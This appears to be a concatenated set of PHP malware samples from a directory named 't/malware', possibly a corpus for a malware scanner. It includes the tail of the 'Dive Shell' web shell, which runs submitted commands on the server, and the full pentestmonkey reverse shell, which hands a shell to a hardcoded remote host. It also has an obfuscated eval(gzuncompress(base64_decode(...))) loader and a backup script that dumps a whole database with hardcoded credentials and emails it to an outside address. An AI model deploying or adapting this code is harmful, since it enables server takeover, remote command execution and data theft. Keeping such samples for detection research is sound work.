 28 |         $new_dir = $regs[1];
 29 |       } else {
 30 | 
 31 |         $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
 32 |       }
 33 |       
 34 | 
 35 |       while (strpos($new_dir, '/./') !== false)
 36 |         $new_dir = str_replace('/./', '/', $new_dir);
 37 | 
 38 | 
 39 |       while (strpos($new_dir, '//') !== false)
 40 |         $new_dir = str_replace('//', '/', $new_dir);
 41 | 
 42 |       while (preg_match('|/\.\.(?!\.)|', $new_dir))
 43 |         $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
 44 |       
 45 |       if ($new_dir == '') $new_dir = '/';
 46 |       
 47 | 
 48 |       if (@chdir($new_dir)) {
 49 |         $_SESSION['cwd'] = $new_dir;
 50 |       } else {
 51 |         $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
 52 |       }
 53 |       
 54 |     } else {
 55 | 
 56 |       chdir($_SESSION['cwd']);
 57 | 
 58 |       $length = strcspn($_REQUEST['command'], " \t");
 59 |       $token = substr($_REQUEST['command'], 0, $length);
 60 |       if (isset($aliases[$token]))
 61 |         $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
 62 |     
 63 |       $p = proc_open($_REQUEST['command'],
 64 |                      array(1 => array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
 97 | ?>
 98 | 
 99 | <head>
100 |   <title>Dive Shell - Emperor Hacking Team</title>
101 |   <link rel="stylesheet" href="Simshell.css" type="text/css" />
102 | 
103 |   <script type="text/javascript" language="JavaScript">
104 |   var current_line = 0;
105 |   var command_hist = new Array(<?php echo $js_command_hist ?>);
106 |   var last = 0;
107 | 
108 |   function key(e) {
109 |     if (!e) var e = window.event;
110 | 
111 |     if (e.keyCode == 38 && current_line < command_hist.length-1) {
112 |       command_hist[current_line] = document.shell.command.value;
113 |       current_line++;
114 |       document.shell.command.value = command_hist[current_line];
115 |     }
116 | 
117 |     if (e.keyCode == 40 && current_line > 0) {
118 |       command_hist[current_line] = document.shell.command.value;
119 |       current_line--;
120 |       document.shell.command.value = command_hist[current_line];
121 |     }
122 | 
123 |   }
124 | 
125 | function init() {
126 |   document.shell.setAttribute("autocomplete", "off");
127 |   document.shell.output.scrollTop = document.shell.output.scrollHeight;
128 |   document.shell.command.focus();
129 | }
130 | 
131 |   </script>
132 | </head>
133 | 
134 | <body   onload="init()" style="color: #00FF00; background-color: #000000">
135 | 
136 | <span style="background-color: #FFFFFF">
137 | 
138 | 
139 | 
140 | </body>
141 | 
142 | </body>
143 | </html>
144 | 
145 | 
146 | 
147 | </span>
148 | 
149 | 
150 | 
151 | <p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
152 | <span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
153 | </font></p>
154 | 
155 | <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
156 | <div style="width: 989; height: 456">
157 |   <p align="center"><b>
158 |   <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
159 |                 onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
160 |   <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
161 |   </font>
162 |   &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
163 | <?php
164 | $lines = substr_count($_SESSION['output'], "\n");
165 | $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
166 | echo rtrim($padding . $_SESSION['output']);
167 | ?>
168 | </textarea> </p>
169 | <p class="prompt" align="center">
170 |   <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b> 
171 |   <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
172 | <p class="prompt" align="center">
173 |   <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
174 | <p class="prompt" align="center">
175 |   <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
176 | &nbsp;</font></p>
177 | </div>
178 | </form>
179 | 
180 | 
181 | <p class="prompt" align="center">
182 |   <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
183 |   </b></p>
184 | 
185 | 
186 | 
187 | </html>
188 | 


--------------------------------------------------------------------------------
/t/malware/80.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | // php-reverse-shell - A Reverse Shell implementation in PHP
  3 | // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
  4 | //
  5 | // This tool may be used for legal purposes only.  Users take full responsibility
  6 | // for any actions performed using this tool.  The author accepts no liability
  7 | // for damage caused by this tool.  If these terms are not acceptable to you, then
  8 | // do not use this tool.
  9 | //
 10 | // In all other respects the GPL version 2 applies:
 11 | //
 12 | // This program is free software; you can redistribute it and/or modify
 13 | // it under the terms of the GNU General Public License version 2 as
 14 | // published by the Free Software Foundation.
 15 | //
 16 | // This program is distributed in the hope that it will be useful,
 17 | // but WITHOUT ANY WARRANTY; without even the implied warranty of
 18 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 19 | // GNU General Public License for more details.
 20 | //
 21 | // You should have received a copy of the GNU General Public License along
 22 | // with this program; if not, write to the Free Software Foundation, Inc.,
 23 | // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 24 | //
 25 | // This tool may be used for legal purposes only.  Users take full responsibility
 26 | // for any actions performed using this tool.  If these terms are not acceptable to
 27 | // you, then do not use this tool.
 28 | //
 29 | // You are encouraged to send comments, improvements or suggestions to
 30 | // me at pentestmonkey@pentestmonkey.net
 31 | //
 32 | // Description
 33 | // -----------
 34 | // This script will make an outbound TCP connection to a hardcoded IP and port.
 35 | // The recipient will be given a shell running as the current user (apache normally).
 36 | //
 37 | // Limitations
 38 | // -----------
 39 | // proc_open and stream_set_blocking require PHP version 4.3+, or 5+
 40 | // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
 41 | // Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
 42 | //
 43 | // Usage
 44 | // -----
 45 | // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
 46 | 
 47 | set_time_limit (0);
 48 | $VERSION = "1.0";
 49 | $ip = '127.0.0.1';  // CHANGE THIS
 50 | $port = 1234;       // CHANGE THIS
 51 | $chunk_size = 1400;
 52 | $write_a = null;
 53 | $error_a = null;
 54 | $shell = 'uname -a; w; id; /bin/sh -i';
 55 | $daemon = 0;
 56 | $debug = 0;
 57 | 
 58 | //
 59 | // Daemonise ourself if possible to avoid zombies later
 60 | //
 61 | 
 62 | // pcntl_fork is hardly ever available, but will allow us to daemonise
 63 | // our php process and avoid zombies.  Worth a try...
 64 | if (function_exists('pcntl_fork')) {
 65 | 	// Fork and have the parent process exit
 66 | 	$pid = pcntl_fork();
 67 | 	
 68 | 	if ($pid == -1) {
 69 | 		printit("ERROR: Can't fork");
 70 | 		exit(1);
 71 | 	}
 72 | 	
 73 | 	if ($pid) {
 74 | 		exit(0);  // Parent exits
 75 | 	}
 76 | 
 77 | 	// Make the current process a session leader
 78 | 	// Will only succeed if we forked
 79 | 	if (posix_setsid() == -1) {
 80 | 		printit("Error: Can't setsid()");
 81 | 		exit(1);
 82 | 	}
 83 | 
 84 | 	$daemon = 1;
 85 | } else {
 86 | 	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
 87 | }
 88 | 
 89 | // Change to a safe directory
 90 | chdir("/");
 91 | 
 92 | // Remove any umask we inherited
 93 | umask(0);
 94 | 
 95 | //
 96 | // Do the reverse shell...
 97 | //
 98 | 
 99 | // Open reverse connection
100 | $sock = fsockopen($ip, $port, $errno, $errstr, 30);
101 | if (!$sock) {
102 | 	printit("$errstr ($errno)");
103 | 	exit(1);
104 | }
105 | 
106 | // Spawn shell process
107 | $descriptorspec = array(
108 |    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
109 |    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
110 |    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
111 | );
112 | 
113 | $process = proc_open($shell, $descriptorspec, $pipes);
114 | 
115 | if (!is_resource($process)) {
116 | 	printit("ERROR: Can't spawn shell");
117 | 	exit(1);
118 | }
119 | 
120 | // Set everything to non-blocking
121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't
122 | stream_set_blocking($pipes[0], 0);
123 | stream_set_blocking($pipes[1], 0);
124 | stream_set_blocking($pipes[2], 0);
125 | stream_set_blocking($sock, 0);
126 | 
127 | printit("Successfully opened reverse shell to $ip:$port");
128 | 
129 | while (1) {
130 | 	// Check for end of TCP connection
131 | 	if (feof($sock)) {
132 | 		printit("ERROR: Shell connection terminated");
133 | 		break;
134 | 	}
135 | 
136 | 	// Check for end of STDOUT
137 | 	if (feof($pipes[1])) {
138 | 		printit("ERROR: Shell process terminated");
139 | 		break;
140 | 	}
141 | 
142 | 	// Wait until a command is end down $sock, or some
143 | 	// command output is available on STDOUT or STDERR
144 | 	$read_a = array($sock, $pipes[1], $pipes[2]);
145 | 	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
146 | 
147 | 	// If we can read from the TCP socket, send
148 | 	// data to process's STDIN
149 | 	if (in_array($sock, $read_a)) {
150 | 		if ($debug) printit("SOCK READ");
151 | 		$input = fread($sock, $chunk_size);
152 | 		if ($debug) printit("SOCK: $input");
153 | 		fwrite($pipes[0], $input);
154 | 	}
155 | 
156 | 	// If we can read from the process's STDOUT
157 | 	// send data down tcp connection
158 | 	if (in_array($pipes[1], $read_a)) {
159 | 		if ($debug) printit("STDOUT READ");
160 | 		$input = fread($pipes[1], $chunk_size);
161 | 		if ($debug) printit("STDOUT: $input");
162 | 		fwrite($sock, $input);
163 | 	}
164 | 
165 | 	// If we can read from the process's STDERR
166 | 	// send data down tcp connection
167 | 	if (in_array($pipes[2], $read_a)) {
168 | 		if ($debug) printit("STDERR READ");
169 | 		$input = fread($pipes[2], $chunk_size);
170 | 		if ($debug) printit("STDERR: $input");
171 | 		fwrite($sock, $input);
172 | 	}
173 | }
174 | 
175 | fclose($sock);
176 | fclose($pipes[0]);
177 | fclose($pipes[1]);
178 | fclose($pipes[2]);
179 | proc_close($process);
180 | 
181 | // Like print, but does nothing if we've daemonised ourself
182 | // (I can't figure out how to redirect STDOUT like a proper daemon)
183 | function printit ($string) {
184 | 	if (!$daemon) {
185 | 		print "$string\n";
186 | 	}
187 | }
188 | 
189 | ?> 
190 | 
191 | 
192 | 
193 | 


--------------------------------------------------------------------------------
/t/malware/43.php:
--------------------------------------------------------------------------------
1 | <?$d='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';eval(gzuncompress(base64_decode('eNpdUGFrwjAQ/SslZLRFpHPMfdCkFfYDJsxvY5PYnGshTbIm1bnS/76LVZj7csl7vHvv7qhVfOV8q0An1ArneO0c+IRu1y+vm7c4UPF7WjRy/p9bJLfSSrgqSG/xInTGcZqmS/onSvKdcPD0uJVQGglIoGBv2oRqfr+kmlGFdTJJeyp7qgdeVm1iWpmMMP04/8MkCO+oVQP2D/U+OK8+fzpdmsa24NzZuYeDUAkpcipZQVAIykFf5KzyjcIKQuasAS+iyns7ha+uPnDybLQH7aebkwUSlSPixMO3z0LjMior0eIJ+LHW0hzddPYwn5Gc+doryNc43BHHZNmIWTbm7Iw85axEL2hzhjs3EUZXRnISDof9tbadjzzGcmIvLiTSorlgEmW3Itftmtqf6SwY4nP1z8a4bNy0GH4BG4Kl3A==')));?>


--------------------------------------------------------------------------------
/t/malware/14.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | /*
  3 | * Backup script on server.
  4 | *
  5 | * Runs on the server, called by Cron. Connects to the mySQL
  6 | * database and creates a backup file of the whole database.
  7 | * Saves to file in current directory.
  8 | *
  9 | * @author Cow <cow@invisionize.com>
 10 | * @version 0.2
 11 | * @date 18/08/2004
 12 | * @package Backup Server
 13 | * Upgraded Ver 2.0 (sending sql backup as attachment
 14 | * as email attachment, or send to a remote ftp server by
 15 | * @co-authors Cool Surfer<Coolsurfer@gmail.com> and
 16 | * Neagu Mihai<neagumihai@hotmail.com>
 17 | */
 18 | 
 19 | set_time_limit(0);
 20 | $date = date("mdy-hia");
 21 | $dbserver = "localhost";
 22 | $dbuser = "vhacker_robot";
 23 | $dbpass = "mp2811987";
 24 | $dbname = "tvhacker_vbb3";
 25 | $file = "N-Cool-$date.sql.gz";
 26 | $gzip = TRUE;
 27 | $silent = TRUE;
 28 | 
 29 | function write($contents) {
 30 |     if ($GLOBALS['gzip']) {
 31 |         gzwrite($GLOBALS['fp'], $contents);
 32 |     } else {
 33 |         fwrite($GLOBALS['fp'], $contents);
 34 |     }
 35 | }
 36 | 
 37 | mysql_connect ($dbserver, $dbuser, $dbpass);
 38 | mysql_select_db($dbname);
 39 | 
 40 | if ($gzip) {
 41 |     $fp = gzopen($file, "w");
 42 | } else {
 43 |     $fp = fopen($file, "w");
 44 | }
 45 | 
 46 | $tables = mysql_query ("SHOW TABLES");
 47 | while ($i = mysql_fetch_array($tables)) {
 48 |     $i = $i['Tables_in_'.$dbname];
 49 | 
 50 |     if (!$silent) {
 51 |         echo "Backing up table ".$i."\n";
 52 |     }
 53 | 
 54 |     // Create DB code
 55 |     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
 56 | 
 57 |     write($create['Create Table'].";\n\n");
 58 | 
 59 |     // DB Table content itself
 60 |     $sql = mysql_query ("SELECT * FROM ".$i);
 61 |     if (mysql_num_rows($sql)) {
 62 |         while ($row = mysql_fetch_row($sql)) {
 63 |             foreach ($row as $j => $k) {
 64 |                 $row[$j] = "'".mysql_escape_string($k)."'";
 65 |             }
 66 | 
 67 |             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
 68 |         }
 69 |     }
 70 | }
 71 | 
 72 | $gzip ? gzclose($fp) : fclose ($fp);
 73 | 
 74 | // Optional Options You May Optionally Configure
 75 | 
 76 | $use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
 77 | $remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
 78 | $remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
 79 | 
 80 | // Configure the path that this script resides on your server.
 81 | 
 82 | $savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
 83 | 
 84 | $send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
 85 | $to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
 86 | $from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
 87 | 
 88 | $senddate = date("j F Y");
 89 | 
 90 | $subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
 91 | $message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
 92 | 
 93 | $use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
 94 | $ftp_server = "localhost";               // FTP hostname
 95 | $ftp_user_name = "ftp_username"; // FTP username
 96 | $ftp_user_pass = "ftp_password";   // FTP password
 97 | $ftp_path = "/"; // This is the path to upload on your ftp server!
 98 | 
 99 | // Do not Modify below this line! It will void your warranty :-D!
100 | 
101 | $date = date("mdy-hia");
102 | $filename = "$savepath/$dbname-$date.sql";
103 | 
104 | if($use_gzip=="yes"){
105 | $filename2 = $file;
106 | } else {
107 | $filename2 = "$savepath/$dbname-$date.sql";
108 | }
109 | 
110 | 
111 | if($send_email == "yes" ){
112 | $fileatt_type = filetype($filename2);
113 | $fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
114 | 
115 | $headers = "From: $from";
116 | 
117 | // Read the file to be attached ('rb' = read binary)
118 | echo "Openning archive for attaching:".$filename2;
119 | $file = fopen($filename2,'rb');
120 | $data = fread($file,filesize($filename2));
121 | fclose($file);
122 | 
123 | // Generate a boundary string
124 | $semi_rand = md5(time());
